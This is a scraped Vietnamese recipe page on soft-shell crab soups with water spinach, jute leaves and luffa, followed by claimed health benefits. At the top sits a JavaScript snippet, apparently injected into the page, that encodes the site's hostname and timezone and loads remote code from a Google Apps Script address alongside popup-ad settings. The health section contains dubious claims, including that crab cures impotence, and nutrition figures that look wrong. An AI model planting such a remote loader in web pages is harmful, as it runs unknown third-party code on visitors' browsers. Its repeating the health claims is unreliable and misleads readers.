var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Ghẹ Sữa Ăn Có Tốt Không? Những Món Ăn Ngon Từ Ghẹ Sữa – Hải Sản Tươi Sống

Ghẹ sữa ăn có tốt không? Ghẹ sữa là một món ăn rất quen thuộc đối với mỗi người chúng ta. Trong ghẹ có rất nhiều thành phần dinh dưỡng tốt có lợi cho sức khỏe. Chính vì vậy, các bậc cha mẹ thường lựa chọn chúng để làm món ăn cho các con. Tuy nhiên, về những tác dụng của ghẹ sữa thì không phải ai cũng nắm được. Sau đây hãy cùng chúng tôi theo dõi bài viết dưới đây để biết được các công thức chế biến ghẹ sữa ngon nhé.

Ghẹ sữa nấu rau muống

Nguyên liệu

  • Ghẹ sữa
  • Rau muống
  • Hành khô
  • Các gia vị khác như mắm, muối, mì chính

Cách làm

Bước 1: Sơ chế các nguyên liệu

  • Ghẹ sữa mua về đem làm sạch, bỏ mai, rửa rồi để ráo nước
  • Rau muống nhặt lấy phần non, ngâm nước muối pha loãng khoảng 15 phút
  • Hành khô bỏ vỏ, băm nhỏ

Bước 2: Tiến hành nấu ghẹ sữa

  • Bắc chảo lên bếp, thêm chút dầu ăn.
  • Đợi dầu sôi thì phi thơm hành khô lên, đổ ghẹ vào, đảo ghẹ đều tay cho đến khi ghẹ chuyển sang màu màu hồng hồng đỏ đỏ thì đổ nước lọc vào.
  • Lượng nước lọc đổ vào nhiều hay ít tùy thuộc vào số lượng thành viên của gia đình ban.
  • Đợi cho đến khi nước sôi, bạn nêm chút gia vị như muối, mì chính vào cho vừa ăn.
  • Tiếp tục đun sôi cho đến khi ghẹ chín, đổ rau muống vào, đun khoảng 2 phút cho rau chín thì tắt bếp.
  • Cuối cùng, chỉ cần múc canh ra tô rồi thưởng thức cùng gia đình.

Ghẹ sữa nấu ray đay, mồng tơi, mướp hương

Nguyên liệu

  • Ghẹ sữa
  • Rau đay, rau mùng tơi, mướp hương
  • Hành khô
  • Gia vị: muối, mì chính

Cách làm

Bước 1: Sơ chế các nguyên liệu

  • Ghẹ sữa mua về đem rửa sạch, bóc mai lấy phần gạch.
  • Phần thân ghẹ đem bóc sạch thịt, đem bỏ thịt và gạch vào một cái bát để riêng. Xác ghẹ đổ vào cối giã, thêm chút nước lọc hòa đều và lất tay bóp nhẹ cho ghẹ tan ra.
  • Dùng rây lọc lấy phần nước, bỏ phần bã. Bạn cũng có thể hòa thêm nước lọc vào để tiếp tục lấy nước ghẹ.
  • Sau đó, loại bỏ cặn của nước bằng cách chắt nước từ tô này sang tô khác.
  • Rau đay, mùng tơi nhặt sạch, rửa rồi để ráo. Thái chúng thành từng khúc.
  • Mướp hương gọt bỏ vỏ, rửa sạch, thái từng miếng hình vòng cung. Hành khô nhặt vỏ, thái lát.

Bước 2: Nấu canh ghẹ

  • Bắc chảo lên bếp, đổ dầu ăn vào, đun sôi rồi phi hành khô cho dậy mùi thơm.
  • Sau đó, đổ gạch ghẹ và thịt ghẹ vào, xào khô, nêm một chút muối cho vừa.
  • Tiếp đó, đổ nước ghẹ vào. Đun sôi với lửa vừa, nếu nước sôi thì vặn nhỏ lửa lại.
  • Khi sôi, phần gạch sẽ đặc lại. Vớt phần riêu ra. Cho rau và mướp vào nấu chín cùng, rồi cho tiếp phần riêu vào. Đợi cho rau và mướp chín thì tắt bếp, múc canh ra tô lớn.
  • Sẽ tuyệt hơn nếu bạn ăn kèm canh với cà muối chua. Món canh mướp mồng tơi ghẹ sữa có vị ngọt đậm, giàu dinh dưỡng, nước canh trong, thịt ghẹ đầy nên được rất nhiều ưa thích.

Lợi ích của ghẹ sữa đối với sức khỏe

Đối với trẻ nhỏ

Ghẹ sữa ăn có tốt không? Trong thịt ghẹ có chứa rất nhiều các nhóm Vitamin khác nhau đặc biệt là các nhóm vitamin B, các khoáng chất như sắt, kali, canxi, đồng… đặc biệt trong ghẹ sữa lại có rất ít thủy ngân vì vậy cha mẹ có thể cho bé ăn để mang lại một sức khỏe tốt. Theo thống kê thì trong 85g thịt ghẹ sẽ cung cấp tới 300 – 500mg chất béo. Đồng thời chúng cũng cung cấp rất nhiều các axit béo là Omega 3 tốt cho não bộ.

Tuy nhiên, hiện nay nhiều bà mẹ lại có suy nghĩ cho bé ăn nhiều thịt ghẹ quá vì nhiều Cholesterol. Nhưng các mẹ có thể hoàn toàn an tâm bởi theo nghiên cứu lượng cholesterol trong thịt ghẹ chỉ là 30 đến 56mg/kg ít hơn các loại thịt gà và thịt thăn lợn mà các mẹ cho bé ăn. Vì vậy, các mẹ hãy cứ bổ sung thịt ghẹ cho con để con có sức khỏe tốt nhất.

Đối với những người đang mang thai

Trong quá trình mang thai thì các mẹ cần phải bổ sung nhiều dinh dưỡng để thai nhi phát triển. Và không thể thiếu được trong bữa ăn của các mẹ đó là nguyên liệu ghẹ sữa. Với số lượng Protein cao, omega 3 và nhiều các chất dinh dưỡng khác chắc chắn sẽ giúp thai nhi phát triển toàn diện và ngăn ngừa được những tác hại đối với sự phát triển của các bé nhỏ.

Đặc biệt, trong ghẹ còn có nhiều chứa protein giúp tăng sức đề kháng cho các mẹ. Cùng với đó là nguồn thực phẩm phong phú có chứa axit béo Omega 3 là yếu tố cần thiết và quan trọng tốt cho sự phát triển não bộ của thai nhi và làm đôi mắt thai nhi phát triển.

Đối với các quý ông

Còn có một tác dụng của thịt ghẹ mà ít người biết đến đó chính là tăng cường sinh lực cho các quý ông. Bởi trong ghẹ có nhiều thành phần giúp chữa chứng bệnh liệt dương, bồi bổ cơ thể. Vì vậy, các quý ông nên bổ sung thực phẩm này trong bữa ăn hàng ngày của gia đình mình.